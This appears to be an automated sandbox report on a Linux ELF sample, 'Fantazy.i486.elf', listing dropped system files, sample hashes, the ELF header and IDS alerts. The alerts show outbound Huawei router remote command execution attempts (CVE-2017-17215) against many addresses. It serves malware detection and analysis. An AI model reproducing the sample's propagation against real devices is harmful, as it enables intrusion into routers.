                                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):116
                                                Entropy (8bit):4.957035419463244
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+ugKQ2KwshcXSv:SbFuFyLwH47Pg20ggWunQ2rNXc
                                                MD5:66D114877B3B4DB3BDD8A3AD4F5E7421
                                                SHA1:62E0CB0F51E0E3F97BE251CB917968DFF69ED344
                                                SHA-256:A922628916A7DDBE2BAA33F421C82250527EA3C28E429749353A1C75C0C18860
                                                SHA-512:5651247FA236DCF020A3C8456E4A9A74A85C5B9B3CCE94A3CF8F85FD4D66465C9F97DF7A1822E6CA4553C02BE149F3021D58DCC0C8CB6DCF37F915BD0A158187
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):95
                                                Entropy (8bit):4.921230646592726
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):95
                                                Entropy (8bit):4.921230646592726
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):95
                                                Entropy (8bit):4.921230646592726
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):95
                                                Entropy (8bit):4.921230646592726
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):282
                                                Entropy (8bit):5.313815415711933
                                                Encrypted:false
                                                SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0Ixff6d7gS63+BN2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibB+gS2+OthQHtPYq9M
                                                MD5:2C73DEB8E3ED12CB003CEBC37292082A
                                                SHA1:2FA68D86C2EF0D566F8352C3956EC6C05C71CEA0
                                                SHA-256:BBF0BFEFA06A1258FFE341F379D6073E9C7092818C1E18729BA2F07F3A10D2BC
                                                SHA-512:161F044B96F2CF18D9E018219F5A8F09BA2DA58CDE770F8CA3A911910F7F5FA1858DAC814618EF24FF2A30833F2A9E1FF55A1B669DD9DDC9A1DEC6E7873920B3
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12350.REALTIME=1739375867686025.MONOTONIC=461713486.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):188
                                                Entropy (8bit):4.928997328913428
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMs5BuSgVuMI2sKiYiesnAv/XS12K2hwEY8mTQ2pJi22sQ2KkmD2pi:SbFuFyL3BVgVuR257iesnAi12thQc2p4
                                                MD5:065A3AD1A34A9903F536410ECA748105
                                                SHA1:21CD684DF60D569FA96EEEB66A0819EAC1B2B1A4
                                                SHA-256:E80554BF0FF4E32C61D4FA3054F8EFB27A26F1C37C91AE4EA94445C400693941
                                                SHA-512:DB3C42E893640BAEE9F0001BDE6E93ED40CC33198AC2B47328F577D3C71E2C2E986AAAFEF5BD8ADBC639B5C24ADF715D87034AE24B697331FF6FEC5962630064
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):223
                                                Entropy (8bit):5.473843876084242
                                                Encrypted:false
                                                SSDEEP:6:SbFuFyL3BVgdL87ynAir/0Ixff6lgTgS63+Bpot6Fho:qgFq30dABibB3TgS2+QIPo
                                                MD5:34722AAED47A225A67118D35C5A3E5E9
                                                SHA1:6D2B1A5BB02652BDB43E9E23A37D0A0BCEF56D6D
                                                SHA-256:CFB46EA9B0CB0BA2280D57233D93D64DC76090F700A80E933575D20F47B978EC
                                                SHA-512:0C7DCF6BD07CD853E0F74EB908B5D8AC1CDD189F33C20B681742080003164E47EEA47C5E6A7387848B81ED79D59DCCAC341AD7D16B86EDB36B906F30967CC460
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12412.REALTIME=1739375867686025.MONOTONIC=461713486.LAST_SESSION_TIMESTAMP=461775352.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):174
                                                Entropy (8bit):5.320882704750514
                                                Encrypted:false
                                                SSDEEP:3:SbFVVmFyinKMs5BuSgdNR2sKiYiesnAv/XSHxJgM6q763+x4Ivpo206qodrhM/n:SbFuFyL3BVgdL87iesnAiRJgS63+Bpof
                                                MD5:DAF4D863EF277C603571244CA77B51E6
                                                SHA1:B7ED908F30D863756EC01298FC3C1D0AC1A3BC96
                                                SHA-256:D54ADCA9BA8AD11186580739719B91A4864FCF3B81E8656690C6A0DC5042BF06
                                                SHA-512:0D42A60F001CF768B08F970B6898105AF26B7EE5072C1CD9EDA40B141C24437919478A4F60AA80E9380FED324210A920A4C29CAFAD94EE91E9D8B3E94A554B6F
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=no.RUNTIME=/run/user/127.REALTIME=1739375867686025.MONOTONIC=461713486.LAST_SESSION_TIMESTAMP=461775352.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):282
                                                Entropy (8bit):5.313815415711933
                                                Encrypted:false
                                                SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0Ixff6d7gS63+BN2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibB+gS2+OthQHtPYq9M
                                                MD5:2C73DEB8E3ED12CB003CEBC37292082A
                                                SHA1:2FA68D86C2EF0D566F8352C3956EC6C05C71CEA0
                                                SHA-256:BBF0BFEFA06A1258FFE341F379D6073E9C7092818C1E18729BA2F07F3A10D2BC
                                                SHA-512:161F044B96F2CF18D9E018219F5A8F09BA2DA58CDE770F8CA3A911910F7F5FA1858DAC814618EF24FF2A30833F2A9E1FF55A1B669DD9DDC9A1DEC6E7873920B3
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12350.REALTIME=1739375867686025.MONOTONIC=461713486.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                                                Process:/lib/systemd/systemd-logind
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):223
                                                Entropy (8bit):5.473843876084242
                                                Encrypted:false
                                                SSDEEP:6:SbFuFyL3BVgdL87ynAir/0Ixff6lgTgS63+Bpot6Fho:qgFq30dABibB3TgS2+QIPo
                                                MD5:34722AAED47A225A67118D35C5A3E5E9
                                                SHA1:6D2B1A5BB02652BDB43E9E23A37D0A0BCEF56D6D
                                                SHA-256:CFB46EA9B0CB0BA2280D57233D93D64DC76090F700A80E933575D20F47B978EC
                                                SHA-512:0C7DCF6BD07CD853E0F74EB908B5D8AC1CDD189F33C20B681742080003164E47EEA47C5E6A7387848B81ED79D59DCCAC341AD7D16B86EDB36B906F30967CC460
                                                Malicious:false
                                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12412.REALTIME=1739375867686025.MONOTONIC=461713486.LAST_SESSION_TIMESTAMP=461775352.
                                                Process:/usr/bin/pulseaudio
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):5
                                                Entropy (8bit):1.9219280948873623
                                                Encrypted:false
                                                SSDEEP:3:mTc:mw
                                                MD5:2BEF98AB87236CD604D2F874E253B669
                                                SHA1:7DBB72189B78B5BA223A2580F498371BAC580134
                                                SHA-256:F5224CE9FBDE6F38922B053F8E3F597AED3EB24A70BCA5F929CA927840553B7D
                                                SHA-512:1CFAA10BFAC6B9A72F0792827C5A058E9F81FABF41DAB306FFEFDEECE70D743BB0E2C04E77E1588DD2AA201D13C9EAC920E07EB4324BB16AF6E5A8EC9C7624A9
                                                Malicious:false
                                                Preview:7067.
                                                Process:/sbin/agetty
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):384
                                                Entropy (8bit):0.6775035134351417
                                                Encrypted:false
                                                SSDEEP:3:1G1sXlXEWtl/ou:1h+ylw
                                                MD5:9B1DC025F6D2188498FDB29371BAB18B
                                                SHA1:5A9F80FDE11FE6C54BE29EB16E848F14B3C9F8A1
                                                SHA-256:BDAA1245A34F5EC50A0963AA5304D137B0CA1D6441B815526F4F94CC84C190C8
                                                SHA-512:BD0D6F95B4D74606C2975A1F7E5CF809AE2750B23CE81E4EC4557D5939EEFF1FDA29B92953863D1AA5F9BBF332B14023A5301CAB27C5708E7D35BD246AB920E0
                                                Malicious:false
                                                Preview:....W...tty2.tty2.......................tty2LOGIN...............................................................................................................................................................................................................................................................................................W...~.g.[......................................
                                                Process:/usr/lib/accountsservice/accounts-daemon
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):4.66214589518167
                                                Encrypted:false
                                                SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                                                MD5:542BA3FB41206AE43928AF1C5E61FEBC
                                                SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                                                SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                                                SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                                                Malicious:false
                                                Preview:[User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                                                Process:/usr/bin/gpu-manager
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):2.7550849518197795
                                                Encrypted:false
                                                SSDEEP:3:JoT/V9fDVbn:M/V3n
                                                MD5:078760523943E160756979906B85FB5E
                                                SHA1:0962643266F4C5537F7D125046F28F21D6DD0C89
                                                SHA-256:048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
                                                SHA-512:DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
                                                Malicious:false
                                                Preview:15ad:0405;0000:00:0f:0;1.
                                                Process:/usr/sbin/rsyslogd
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):748
                                                Entropy (8bit):4.804404115829656
                                                Encrypted:false
                                                SSDEEP:12:lKWFPZPaV5pKRKWFdoRiFpfoiFpCoiFGnMhiFOAvmqiFOA2+VQoiFf:lKGZeMRK4oR8A8x1nWvAvpvA2+VQoy
                                                MD5:098190B82AD501FE3A33C2332E54360A
                                                SHA1:706C81C8B543215DBC857666934940782FC81B3C
                                                SHA-256:E778A925DC7B65E9A198071D4A1D37CA10A56AA1BB0203F8A4BE634BBAD45745
                                                SHA-512:D4EDD52D58A02AD0B7C05A361F5E2A0AB04AAE85FE021DCBCF95B92ED60F015053F3F593D233D219CB96FA3D94D6BFBA6875A9786F5EA8FBEB4F256F4DD9DCC4
                                                Malicious:false
                                                Preview:Feb 12 10:00:02 galassia systemd-logind[7008]: Failed to add user by file name 1000, ignoring: Invalid argument.Feb 12 10:00:02 galassia systemd-logind[7008]: User enumeration failed: Invalid argument.Feb 12 10:00:03 galassia systemd-logind[7008]: User of session c2 not known..Feb 12 10:00:03 galassia systemd-logind[7008]: User of session 2 not known..Feb 12 10:00:03 galassia systemd-logind[7008]: Session enumeration failed: No such file or directory.Feb 12 10:00:03 galassia systemd-logind[7008]: Watching system buttons on /dev/input/event0 (Power Button).Feb 12 10:00:03 galassia systemd-logind[7008]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard).Feb 12 10:00:03 galassia systemd-logind[7008]: New seat seat0..
                                                Process:/usr/bin/gpu-manager
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):1371
                                                Entropy (8bit):4.8296848499188485
                                                Encrypted:false
                                                SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
                                                MD5:3AF77E630DA00B3BE24F4E8AA5D78B13
                                                SHA1:BCF2D99E002F6DE2413A183227B011CFBEF5673D
                                                SHA-256:EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
                                                SHA-512:8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
                                                Malicious:false
                                                Preview:log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
                                                Process:/lib/systemd/systemd-journald
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):240
                                                Entropy (8bit):1.4595260194504922
                                                Encrypted:false
                                                SSDEEP:3:F31HlfhyHuZXeUlHhyHuZXe:F3ZyHuZXewyHuZXe
                                                MD5:259A0874E11CC2C21BA01C72E7EC7079
                                                SHA1:0F1EEC8BE80836073676786C94FC44C0291C37A4
                                                SHA-256:31D74E0D44148D8D602F899114311513B5B556C2EC08376D3ED9B27D98D498A3
                                                SHA-512:0B11D522BD7CEB0B21B44D544D1A551F4929A4C2D6039968CDC46A51556B0B67FFDF8BF04CA3FCBBDA3BE1C26A00AA3DE0FCC76FB5F9DAFE915839221C58EEFE
                                                Malicious:false
                                                Preview:LPKSHHRH................y..i.AOw..<.un%\................................y..i.AOw..<.un%\........................................................................................................................................................
                                                Process:/lib/systemd/systemd-journald
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):240
                                                Entropy (8bit):1.4595260194504922
                                                Encrypted:false
                                                SSDEEP:3:F31HlQbI0XVbI0X6:F3AbVb6
                                                MD5:287A5B08A994FD47068BF4E3FEF0B9BA
                                                SHA1:21308BAE07B404AD6C103AB5E745F46AF1424208
                                                SHA-256:161EDDA714EDDD2BB06EDF3277EC0F159D7F6482FCA35D81C498F95E8159449B
                                                SHA-512:BBAA097B78A40038652CAFA7B89353747EA172C52B82D1A2679AE3AF6C200B1CF8526E648F3DA811D9AEB0408CA6BF3B94688120AC66C731B4340FE0E61E02A9
                                                Malicious:false
                                                Preview:LPKSHHRH.................<....O..(.F.{-..................................<....O..(.F.{-.........................................................................................................................................................
                                                Process:/usr/sbin/rsyslogd
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):2974
                                                Entropy (8bit):4.70614245432021
                                                Encrypted:false
                                                SSDEEP:48:+suZON5+qGOmnnRdH2nRdTWnRd6GXEmXEi4Ji3S5iOh/AEnqBgT5qBgUiqJgULS0:QI8od3EBwDDit1AhHwkSlmqGeH
                                                MD5:0526F76A10A8837021F56C04E6C9919A
                                                SHA1:BDC32149ED8916D1C7E293CBF40A8AF1B1450682
                                                SHA-256:F1710EF01C257273F5F7B68DBFC8812C91641A5A3AC195CD313A51CD5DE05F73
                                                SHA-512:64E50D26F90D4B7ACB91432B8FBD01CA55A9E928A491DD4D8D8790B7CECBB21F3A9BFB8F15F4D4DC19E19FAF67B250012E80513BE64906D9D701F37A4A9E7729
                                                Malicious:false
                                                Preview:Feb 12 09:59:51 galassia kernel: [ 583.244056] blocking signal 0: 6889 -> 1860.Feb 12 09:59:51 galassia kernel: [ 585.721070] New task spawned: old: (tgid 6995, tid 6995), new (tgid: 6995, tid: 6996).Feb 12 09:59:51 galassia kernel: [ 585.721443] New task spawned: old: (tgid 6995, tid 6995), new (tgid: 6995, tid: 6997).Feb 12 09:59:53 galassia kernel: [ 585.722520] New task spawned: old: (tgid 6995, tid 6996), new (tgid: 6995, tid: 6998).Feb 12 09:59:55 galassia kernel: [ 589.458731] New task spawned: old: (tgid 7001, tid 7001), new (tgid: 7001, tid: 7004).Feb 12 09:59:55 galassia kernel: [ 589.486401] New task spawned: old: (tgid 7001, tid 7001), new (tgid: 7001, tid: 7005).Feb 12 09:59:56 galassia kernel: [ 589.862977] New task spawned: old: (tgid 7001, tid 7001), new (tgid: 7001, tid: 7065).Feb 12 09:59:59 galassia kernel: [ 593.681595] New task spawned: old: (tgid 7068, tid 7068), new (tgid: 7068, tid: 7069).Feb 12 09:59:59 galassia kernel: [ 593.681857] New task spawned:
                                                Process:/usr/sbin/rsyslogd
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):12945
                                                Entropy (8bit):5.091634990125135
                                                Encrypted:false
                                                SSDEEP:192:al+dyuCFaWosaWo+CRLbP+KDLQ5JQU9xve:xyuCFaWosaWohxhsJ79xve
                                                MD5:E99232D226C80613C366E2CCA8FFBBBE
                                                SHA1:F4BF6600534D2A8AAD3DF8FC709BC0C04BBF90BB
                                                SHA-256:7E0A991955E1C3EFCF494882680E7093C5FDD5F750AB80490DD0A22D83862ABD
                                                SHA-512:FBF8DD104F6A1F60638FC610E35E0ABED4524FD0B1B832B0594EA0C47203A92A836C2460B7770DC51CBBD634DCE2ED5F49CC901FDF75A86133B5A4887BCFC112
                                                Malicious:false
                                                Preview:Feb 12 09:59:51 galassia systemd[1]: rsyslog.service: Main process exited, code=killed, status=9/KILL.Feb 12 09:59:51 galassia systemd[1]: rsyslog.service: Failed with result 'signal'..Feb 12 09:59:51 galassia systemd[1]: rsyslog.service: Scheduled restart job, restart counter is at 6..Feb 12 09:59:51 galassia systemd[1]: Stopped System Logging Service..Feb 12 09:59:51 galassia systemd[1]: Starting System Logging Service....Feb 12 09:59:51 galassia systemd[1]: Started System Logging Service..Feb 12 09:59:51 galassia kernel: [ 583.244056] blocking signal 0: 6889 -> 1860.Feb 12 09:59:51 galassia kernel: [ 585.721070] New task spawned: old: (tgid 6995, tid 6995), new (tgid: 6995, tid: 6996).Feb 12 09:59:51 galassia kernel: [ 585.721443] New task spawned: old: (tgid 6995, tid 6995), new (tgid: 6995, tid: 6997).Feb 12 09:59:51 galassia rsyslogd: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd. [v8.2001.0].Feb 12 09:59:51 galassia rsyslogd: rsyslogd's gro
                                                Process:/sbin/agetty
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):384
                                                Entropy (8bit):0.6775035134351417
                                                Encrypted:false
                                                SSDEEP:3:1G1sXlXEWtl/ou:1h+ylw
                                                MD5:9B1DC025F6D2188498FDB29371BAB18B
                                                SHA1:5A9F80FDE11FE6C54BE29EB16E848F14B3C9F8A1
                                                SHA-256:BDAA1245A34F5EC50A0963AA5304D137B0CA1D6441B815526F4F94CC84C190C8
                                                SHA-512:BD0D6F95B4D74606C2975A1F7E5CF809AE2750B23CE81E4EC4557D5939EEFF1FDA29B92953863D1AA5F9BBF332B14023A5301CAB27C5708E7D35BD246AB920E0
                                                Malicious:true
                                                Preview:....W...tty2.tty2.......................tty2LOGIN...............................................................................................................................................................................................................................................................................................W...~.g.[......................................
                                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):6.41378395532456
                                                TrID:
                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                File name:Fantazy.i486.elf
                                                File size:82'528 bytes
                                                MD5:c75dc6f52d9c7bfc6d217dab9453718b
                                                SHA1:e9b27b4db5833c4884284176c20b599a0d266d98
                                                SHA256:008dbe2d64a5e29f6672c2df24dffaecbc98145cb2352127164b75972e579f61
                                                SHA512:7dc103a21b2fd3b577d85ca55aa538c4b80e7e5f098fd67f4d95406eb210b3bab52a54fee674ec32abf48217f27e19f49d5af1f2336f9c3b175403f23298b95b
                                                SSDEEP:1536:Ko9dSpfWLxksN9TbJ66SlWl9NpaZ+ISlA5JYrWQ:Jd0cCEl9NpaZ+blbiQ
                                                TLSH:A4834B07E6CBF9F0DD4105FC1467AB36D576AC323230CEA7E7C8BA5769A6212D05226C
                                                File Content Preview:.ELF....................d...4....@......4. ...(.....................A9..A9..............H@..H...H...H...@L..........Q.td................................t..../%.................U......=.....t..D...................l......l.......u........t....h.............

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Intel 80386
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x8048164
                                                Flags:0x0
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:82128
                                                Section Header Size:40
                                                Number of Section Headers:10
                                                Header String Table Index:9
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x80480940x940x110x00x6AX001
                                                .textPROGBITS0x80480b00xb00x125540x00x6AX0016
                                                .finiPROGBITS0x805a6040x126040xc0x00x6AX001
                                                .rodataPROGBITS0x805a6200x126200x13210x00x2A0032
                                                .ctorsPROGBITS0x805c0480x140480x80x00x3WA004
                                                .dtorsPROGBITS0x805c0500x140500x80x00x3WA004
                                                .dataPROGBITS0x805c0680x140680x280x00x3WA004
                                                .bssNOBITS0x805c0a00x140900x4be80x00x3WA0032
                                                .shstrtabSTRTAB0x00x140900x3e0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80480000x80480000x139410x139416.51100x5R E0x1000.init .text .fini .rodata
                                                LOAD0x140480x805c0480x805c0480x480x4c402.39260x6RW 0x1000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-02-12T16:57:00.503363+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357264193.111.52.7137215TCP
                                                2025-02-12T16:57:00.539720+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233521641.251.145.4537215TCP
                                                2025-02-12T16:57:04.994716+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233732041.136.24.19137215TCP
                                                2025-02-12T16:57:06.710976+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338808197.6.20.11737215TCP
                                                2025-02-12T16:57:07.258039+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233433641.246.130.24337215TCP
                                                2025-02-12T16:57:07.438184+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353128156.224.230.537215TCP
                                                2025-02-12T16:57:12.574736+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333390137.82.121.7837215TCP
                                                2025-02-12T16:57:12.856647+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356332196.73.182.4337215TCP
                                                2025-02-12T16:57:20.124727+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233774641.60.239.5037215TCP
                                                2025-02-12T16:57:20.125573+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347756157.190.149.19937215TCP
                                                2025-02-12T16:57:20.125739+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336036197.141.157.8037215TCP
                                                2025-02-12T16:57:20.126148+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333450197.51.43.8037215TCP
                                                2025-02-12T16:57:20.140208+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356976157.28.40.19837215TCP
                                                2025-02-12T16:57:20.140423+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335680197.129.42.13737215TCP
                                                2025-02-12T16:57:20.140522+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353300157.34.117.2537215TCP
                                                2025-02-12T16:57:20.140738+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346186197.118.5.10837215TCP
